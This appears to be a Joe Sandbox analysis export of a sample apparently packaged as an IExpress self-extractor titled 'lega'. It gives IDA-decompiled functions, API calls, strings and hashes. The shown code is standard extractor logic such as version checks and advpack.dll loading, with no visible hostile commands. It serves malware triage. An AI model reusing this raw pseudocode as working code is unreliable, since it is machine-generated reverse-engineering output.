Part of subcall function 002F468F: memcpy_s.MSVCRT ref: 002F46E5
Part of subcall function 002F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,002F2F64,?,00000002,00000000), ref: 002F3A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 002F3AB3

Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554

Part of subcall function 002F6285: GetLastError.KERNEL32(002F5BBC), ref: 002F6285

lstrcmpA.KERNEL32(<None>,00000000), ref: 002F3AD0
LocalFree.KERNEL32 ref: 002F3B13

Part of subcall function 002F6517: FindResourceA.KERNEL32(002F0000,000007D6,00000005), ref: 002F652A
Part of subcall function 002F6517: LoadResource.KERNEL32(002F0000,00000000,?,?,002F2EE8,00000000,002F19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 002F6538
Part of subcall function 002F6517: DialogBoxIndirectParamA.USER32(002F0000,00000000,00000547,002F19E0,00000000), ref: 002F6557
Part of subcall function 002F6517: FreeResource.KERNEL32(00000000,?,?,002F2EE8,00000000,002F19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 002F6560

LocalFree.KERNEL32(00000000,002F3100,00000000,00000000), ref: 002F3AF4

Strings

LICENSE, xrefs: 002F3A46
<None>, xrefs: 002F3AC5

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 26e6e36853591f93819da2166210e253fbb67ac4d05a4a49d01872f061b01cad
Instruction ID: 4ccaca5a67db8fd8815e7a3641608e365eefd6e9b08fc5bacdf6b92df8ecc1d1
Opcode Fuzzy Hash: 26e6e36853591f93819da2166210e253fbb67ac4d05a4a49d01872f061b01cad
Instruction Fuzzy Hash: 81118B70210105ABD724AF72BD0DF37F9A9DFD57E0B10443EB74AD51A1DEB58820CA64

Uniqueness

Uniqueness Score: -1.00%

Function 002F24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E002F24E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x2f8004; // 0x404cc811
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E002F658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E002F6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x002f24e0
0x002f24eb
0x002f24f2
0x002f24f7
0x002f2504
0x002f250e
0x002f251d
0x002f252c
0x002f2541
0x002f2546
0x002f2553
0x002f2555
0x002f2555
0x002f2546
0x002f256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 002F2506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 002F252C
_lopen.KERNEL32(?,00000040), ref: 002F253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 002F254C
_lclose.KERNEL32(00000000), ref: 002F2555

Strings

wininit.ini, xrefs: 002F2510

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: eab604fd2d127ed0199722154e85b6626b6cc1758e379480a360cb8f153011d9
Instruction ID: 0ca69341618789005ae1c2358cab479eaa415f07f21e34f2b6b2b4805d72bb96
Opcode Fuzzy Hash: eab604fd2d127ed0199722154e85b6626b6cc1758e379480a360cb8f153011d9
Instruction Fuzzy Hash: D001B971601128A7C7209B65AC0DEFFBB7CDB457E0F400179FA49D3290DE744E55CA95

Uniqueness

Uniqueness Score: -1.00%

Function 002F36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E002F36EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x2f8004; // 0x404cc811
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x2f8184 = 1;
						 *0x2f8180 = 1;
						L13:
						 *0x2f9a40 = _t119;
						L14:
						__eflags =  *0x2f8a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E002F2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E002F2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x2f8a38 & 0x00000001;
											if(( *0x2f8a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lega");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E002F681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lega", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E002F67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E002F28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x2f9a40 = _t119;
						 *0x2f8184 = 1;
						 *0x2f8180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x2f9a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x2f8184 = _t135;
							 *0x2f8180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E002F44B9(0, _t138);
					L66:
					return E002F6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x002f36f9
0x002f3700
0x002f370c
0x002f3716
0x002f3718
0x002f371b
0x002f3721
0x002f372b
0x002f373d
0x002f3745
0x002f3746
0x002f3746
0x002f3749
0x002f37ab
0x002f37ad
0x002f37ae
0x002f37b3
0x002f37b8
0x002f37b8
0x002f37bf
0x002f37bf
0x002f37c5
0x00000000
0x00000000
0x002f37cb
0x002f37cd
0x00000000
0x00000000
0x002f37d5
0x002f37db
0x002f37e8
0x002f37ea
0x002f37ea
0x002f37ea
0x002f37f0
0x002f37f6
0x002f3805
0x002f3817
0x002f382b
0x002f3830
0x002f3836
0x002f383b
0x002f383d
0x002f38eb
0x002f38eb
0x002f38f2
0x002f390c
0x002f3911
0x002f3911
0x002f3913
0x002f394d
0x002f394d
0x002f394f
0x002f38a9
0x002f38a9
0x002f38b0
0x002f38b2
0x002f38b9
0x002f38bb
0x002f38c1
0x002f3975
0x002f38c7
0x002f38de
0x002f38e0
0x002f38e0
0x002f397b
0x002f397d
0x002f39a9
0x002f397f
0x002f3982
0x002f398b
0x002f398d
0x002f398f
0x002f399f
0x002f39a1
0x002f3991
0x002f3991
0x002f3991
0x002f398f
0x002f39af
0x002f39b6
0x002f3a0f
0x002f3a0f
0x002f3a11
0x002f3a13
0x002f3a19
0x00000000
0x002f39b8
0x002f39b8
0x002f39ba
0x00000000
0x00000000
0x002f39bc
0x002f39bf
0x00000000
0x00000000
0x002f39c3
0x002f39c9
0x002f39ce
0x002f39d0
0x002f39e3
0x002f39e5
0x002f39e6
0x002f39f1
0x002f39f7
0x002f39fa
0x002f3a01
0x002f3a04
0x00000000
0x00000000
0x002f3a06
0x002f3a09
0x002f3a09
0x002f3a0b
0x002f3a0b
0x00000000
0x002f3a09
0x002f39fc
0x00000000
0x002f39fc
0x002f39d3
0x002f39d8
0x002f39da
0x00000000
0x00000000
0x00000000
0x002f39dc
0x002f39b6
0x002f3955
0x002f395b
0x00000000
0x00000000
0x002f3961
0x002f3963
0x00000000
0x00000000
0x002f3969
0x002f3969
0x00000000
0x002f3969
0x002f3915
0x002f3915
0x002f391b
0x002f391f
0x00000000
0x00000000
0x002f392d
0x002f3933
0x002f3938
0x002f393a
0x00000000
0x00000000
0x002f3940
0x002f3946
0x002f394b
0x00000000
0x002f394b
0x00000000
0x002f38f2
0x002f3843
0x002f3845
0x00000000
0x00000000
0x002f384b
0x002f384d
0x002f3883
0x002f3885
0x00000000
0x00000000
0x002f389a
0x002f389e
0x002f389e
0x00000000
0x00000000
0x002f38a0
0x002f38a0
0x002f38a2
0x00000000
0x00000000
0x002f38a4
0x00000000
0x002f38a4
0x002f384f
0x002f3851
0x002f3857
0x002f386e
0x002f3877
0x002f387b
0x00000000
0x00000000
0x00000000
0x002f3881
0x002f3859
0x002f385c
0x002f3862
0x002f3866
0x00000000
0x00000000
0x002f3868
0x00000000
0x002f38f4
0x002f38f4
0x002f38f5
0x002f38fb
0x002f3901
0x002f3901
0x00000000
0x002f390a
0x002f374b
0x002f374e
0x002f375c
0x002f3764
0x002f3769
0x002f376e
0x002f3771
0x002f379c
0x002f379f
0x00000000
0x00000000
0x002f37a3
0x002f37a4
0x00000000
0x002f37a4
0x002f3773
0x002f3777
0x002f3778
0x002f377f
0x002f3781
0x002f378e
0x002f378e
0x002f3794
0x00000000
0x002f3794
0x002f3783
0x00000000
0x00000000
0x002f3785
0x002f378c
0x00000000
0x00000000
0x00000000
0x002f378c
0x002f3750
0x00000000
0x002f372d
0x002f372d
0x002f396b
0x002f396b
0x002f396c
0x002f396e
0x002f396f
0x002f3a1e
0x002f3a1e
0x002f3a22
0x002f3a27
0x002f3a3e
0x002f3a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 002F3723
MessageBeep.USER32(00000000), ref: 002F39C3
MessageBoxA.USER32(00000000,00000000,lega,00000030), ref: 002F39F1

Strings

3, xrefs: 002F3785
lega, xrefs: 002F39E9, 002F3A19

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$lega
API String ID: 2519184315-680046778
Opcode ID: e5472f7a5c26b02173a97e1358d47b9c0d9a2e3c787ed9b39fb19f49e15b1dc2
Instruction ID: e708ac7de1738cd266fc3fa439e89d2c5cdc11d8dbed016d83d5f49f5db1da29
Opcode Fuzzy Hash: e5472f7a5c26b02173a97e1358d47b9c0d9a2e3c787ed9b39fb19f49e15b1dc2
Instruction Fuzzy Hash: 7791E1B1A2121D9BEB34DE25CD84BBAF3A0AB453D0F1501B9DA89D7251D7B08FA0CF41

Uniqueness

Uniqueness Score: -1.00%

Function 002F6517 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E002F6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x2f9a3c; // 0x2f0000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E002F44B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t5 =  &_a16; // 0x2f2ee8
					_t24 =  *_t5;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x002f651f
0x002f652a
0x002f6534
0x002f656b
0x002f6577
0x002f657c
0x002f657c
0x002f6536
0x002f653e
0x002f6542
0x00000000
0x002f6544
0x002f6547
0x002f654c
0x002f6549
0x002f6549
0x002f6549
0x002f655e
0x002f6560
0x002f6569
0x00000000
0x00000000
0x002f6569
0x002f6542
0x002f6587

APIs

FindResourceA.KERNEL32(002F0000,000007D6,00000005), ref: 002F652A
LoadResource.KERNEL32(002F0000,00000000,?,?,002F2EE8,00000000,002F19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 002F6538
DialogBoxIndirectParamA.USER32(002F0000,00000000,00000547,002F19E0,00000000), ref: 002F6557
FreeResource.KERNEL32(00000000,?,?,002F2EE8,00000000,002F19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 002F6560

Strings

./, xrefs: 002F657C

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID: ./
API String ID: 1214682469-1156030697
Opcode ID: 0f6b562781fac4fdadc22f3c626cadb9b07c98ab6e888c57d369344af408cea7
Instruction ID: 969ef348828a811c721b778ca94d5f535f6079a93fa9f257d5e980960dffc2cf
Opcode Fuzzy Hash: 0f6b562781fac4fdadc22f3c626cadb9b07c98ab6e888c57d369344af408cea7
Instruction Fuzzy Hash: 140184B211051ABBDB105E59AC4CEBBB66CEB857F1B410139FA14A3150D6719D20CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 002F6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E002F6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x2f8004; // 0x404cc811
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E002F1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
				_t26 = "advpack.dll";
				E002F658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E002F6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x002f6495
0x002f6495
0x002f64a0
0x002f64a7
0x002f64ab
0x002f64bd
0x002f64c2
0x002f64d3
0x002f64df
0x002f64e8
0x002f6502
0x002f64ee
0x002f64f9
0x002f64f9
0x002f6516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 002F64DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 002F64F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 002F6502

Strings

advpack.dll, xrefs: 002F64C2, 002F64CD, 002F6501
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F64AC

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$advpack.dll
API String ID: 438848745-1736355793
Opcode ID: f264c575c18e3bddfc4b027f3cc6e995aca0bc160b570f50a79bb0f37aa683ca
Instruction ID: 77d371ae0fe9dfdde23c497b10b6416402ac42402a5fef3b01c5ad6c30189969
Opcode Fuzzy Hash: f264c575c18e3bddfc4b027f3cc6e995aca0bc160b570f50a79bb0f37aa683ca
Instruction Fuzzy Hash: 0D01A77051010DABDB109B64EC4DFFAF778DB50760F900179F689A21C0DF709DA5CA51

Uniqueness

Uniqueness Score: -1.00%

Function 002F4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E002F4169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E002F468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E002F468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E002F44B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E002F44B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x002f417d
0x002f418f
0x002f4193
0x002f41b7
0x002f41d3
0x002f41e6
0x00000000
0x002f41e7
0x002f41d5
0x002f41d6
0x002f41d8
0x002f41d9
0x002f41da
0x002f41df
0x002f41e1
0x00000000
0x002f41e1
0x002f41b9
0x002f41ba
0x002f41bc
0x002f41bd
0x002f41be
0x00000000
0x002f41be
0x00000000

APIs

Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
Part of subcall function 002F468F: SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
Part of subcall function 002F468F: LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
Part of subcall function 002F468F: LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
Part of subcall function 002F468F: memcpy_s.MSVCRT ref: 002F46E5
Part of subcall function 002F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,002F30B4), ref: 002F4189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,002F30B4), ref: 002F41E7

Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554

Strings

<None>, xrefs: 002F41C5
FINISHMSG, xrefs: 002F4173, 002F41AB

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: f391a13c1754173302f234d6bb23ed212e470d9072328ca05dceb303b346c8f0
Instruction ID: 16feb64697b07e6ee4c3c28e78b54cd9c2296f07b7a1e26fc6f85ad3315c0fad
Opcode Fuzzy Hash: f391a13c1754173302f234d6bb23ed212e470d9072328ca05dceb303b346c8f0
Instruction Fuzzy Hash: F301A2B572021C7BF3243A655C85F7B918DDB957D5F004035B70AE11809EE8DC214575

Uniqueness

Uniqueness Score: -1.00%

Function 002F7155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F7155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x2f8004; // 0x404cc811
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x2f8004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x2f8004 = _t39;
				}
				_t37 =  !_t36;
				 *0x2f8008 = _t37;
				return _t37;
			}

0x002f715d
0x002f7161
0x002f7165
0x002f7178
0x002f7182
0x002f718e
0x002f7197
0x002f71a0
0x002f71b1
0x002f71b8
0x002f71c4
0x002f71c7
0x002f71cb
0x002f71d5
0x002f71da
0x002f71da
0x002f71dc
0x002f71dc
0x002f71e2
0x002f71e5
0x002f71ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 002F7182
GetCurrentProcessId.KERNEL32 ref: 002F7191
